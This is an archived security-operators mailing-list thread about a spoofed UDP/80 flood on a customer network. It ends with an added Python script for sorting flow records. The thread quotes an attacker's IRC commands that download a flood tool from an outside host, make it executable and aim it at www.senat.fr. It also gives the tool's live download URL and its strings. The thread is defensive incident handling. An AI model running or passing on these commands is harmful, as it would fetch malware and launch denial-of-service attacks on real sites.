[nsp-sec] FW: UDP/80 flows to 89.185.38.26

David Freedman david.freedman at uk.clara.net
Sun Dec 25 08:49:18 EST 2011


I may have struck some gold here: the customer in question is part of the
French national government, and somebody on a private IRC channel I frequent
found a machine of his compromised and attacking an fr .gov site (but not the
same one).


[11:47] <grifferz> system("wget artemisjoy.nl/w/ddb");^M
[11:47] <grifferz> system("chmod 777 ddb");^M
[11:47] <grifferz> system("./ddb www.senat.fr 80 127.0.0.1");^M


Prefix:              91.217.56.0/23
Prefix description:  Tiscom Hosting route object
Country code:        NL
Origin AS:           8455
Origin AS Name:      ATOM86-AS ATOM86 Autonomous System
RPKI status:         No ROA found

$ wget artemisjoy.nl/w/ddb
--2011-12-25 13:46:27--  http://artemisjoy.nl/w/ddb
Resolving artemisjoy.nl... 91.217.56.94, 2a00:ec8:401:1:a044::1
Connecting to artemisjoy.nl|91.217.56.94|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14303 (14K) [text/plain]
Saving to: `ddb'

100%[======================>] 14,303      --.-K/s   in 0.1s

2011-12-25 13:46:27 (121 KB/s) - `ddb' saved [14303/14303]
$ file ddb
ddb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.2.5, not stripped

$ strings ddb

<interesting bits>

DDOS Coder by fastforce
UNKNOWN SECURITY TEAM
fastforce uHu Pink-Cashmere
C* Made in TURKEY C*
NE MUTLU TURKUM DIYENE !!!
COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
www.albanianhaxorz.org /server -m irc.Gigachat.net 6667 -j #ASC
>>> http://www.zone-h.org/en/defacements/filter/filter_defacer=ASC/ <<<

Packeting %s, port %d spoofed as %s
Unknown host : %s
Usage : %s <hedef ip> <hedef port> <spoof ip>

$ md5 ddb
MD5 (ddb) = a3100823936173c6670ad0e011eaa413


The guy is inspecting his netflow now to see if he can identify the source
of the compromise...


On 25/12/2011 13:36, "David Freedman" <david.freedman at eu.clara.net> wrote:

>This attack is still ongoing, though thankfully we are mitigating it.
>We are seeing quite a bit of traffic from OVH (AS16276/AS12322) are any of
>these folk on list?
>
>Dave.
>
>
>On 25/12/2011 00:10, "David Freedman" <david.freedman at uk.clara.net> wrote:
>
>>----------- nsp-security Confidential --------
>>
>>If anybody is seeing UDP/80 flows toward 89.185.38.26, can they please
>>squash, we've had an attack ongoing for the past three hours.
>>
>>Thanks!
>>
>>David Freedman
>>Claranet
>>
>>
>>
>>_______________________________________________
>>nsp-security mailing list
>>nsp-security at puck.nether.net
>>https://puck.nether.net/mailman/listinfo/nsp-security
>>
>>Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
>>community. Confidentiality is essential for effective Internet security
>>counter-measures.
>>_______________________________________________
>
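The thread asks list members to look for UDP/80 flows toward the victim, and the strings in ddb show it takes an explicit <spoof ip> (the IRC paste used 127.0.0.1). The following is an added example, not part of the original e-mail or of any list member's tooling: it aggregates flow records for UDP/80 toward 89.185.38.26 per source and separates sources that are martians (loopback, RFC 1918, and similar) from routable ones, since a flood from 127.0.0.1 is spoofed by definition and should have been dropped by BCP 38 ingress filtering. The flow lines and their space-separated field order are constructed for the example; the RFC 5737 documentation addresses in them stand in for ordinary routable sources and are deliberately left out of the martian list.

```python
"""Triage of flow records for a UDP/80 flood toward one victim.

Added example; the flow export format (one flow per line:
src dst proto sport dport packets bytes) is an assumption, not any
particular collector's output, and the sample lines are constructed.
"""
import ipaddress
from collections import Counter

VICTIM = "89.185.38.26"   # target named in the thread

# Constructed sample export: src dst proto sport dport packets bytes
SAMPLE_FLOWS = """\
198.51.100.7   89.185.38.26 udp 41000 80 18000 1152000
203.0.113.9    89.185.38.26 udp 41001 80 12000 768000
127.0.0.1      89.185.38.26 udp 31337 80 50000 3200000
10.0.0.5       89.185.38.26 udp 1024  80 9000  576000
198.51.100.7   89.185.38.26 udp 41000 80 7000  448000
192.0.2.44     89.185.38.26 tcp 52311 80 12    1800
198.51.100.7   89.185.38.26 udp 53000 53 3     300
"""

# Address blocks that must never appear as a source on the public Internet.
# The RFC 5737 documentation ranges used in the sample are intentionally not
# listed so they can stand in for routable sources; a production bogon list
# would include them.
MARTIANS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
)]


def parse_flows(text):
    """Parse the assumed export into dicts, skipping blank or malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        src, dst, proto, sport, dport, pkts, nbytes = parts
        flows.append({
            "src": src, "dst": dst, "proto": proto.lower(),
            "sport": int(sport), "dport": int(dport),
            "packets": int(pkts), "bytes": int(nbytes),
        })
    return flows


def is_martian(ip):
    """True if the source address lies in a block that cannot be routed to us.

    Such a source is spoofed (ddb takes <spoof ip> on its command line) and
    should have been dropped by the sending network's BCP 38 filtering."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MARTIANS)


def summarize_flood(flows, victim=VICTIM, proto="udp", dport=80):
    """Aggregate packets per source for flows matching the attack signature."""
    per_src = Counter()
    for f in flows:
        if f["dst"] == victim and f["proto"] == proto and f["dport"] == dport:
            per_src[f["src"]] += f["packets"]
    spoofed = {s: n for s, n in per_src.items() if is_martian(s)}
    routable = {s: n for s, n in per_src.items() if s not in spoofed}
    return {
        "total_packets": sum(per_src.values()),
        "top_sources": per_src.most_common(),   # highest packet count first
        "spoofed_sources": spoofed,
        "routable_sources": routable,
    }


if __name__ == "__main__":
    report = summarize_flood(parse_flows(SAMPLE_FLOWS))
    print("UDP/80 packets toward", VICTIM, "=", report["total_packets"])
    for src, pkts in report["top_sources"]:
        tag = "SPOOFED (martian)" if src in report["spoofed_sources"] else "routable"
        print(f"  {src:<15} {pkts:>8} pkts  {tag}")
```

Only the routable sources are worth sending to the originating ASNs for squashing; the spoofed ones identify nothing about the sender, which is why the true origin of a ddb flood has to be found from the attacking host's own flows (its inbound connections before the flood began), as the compromised customer in the thread is doing.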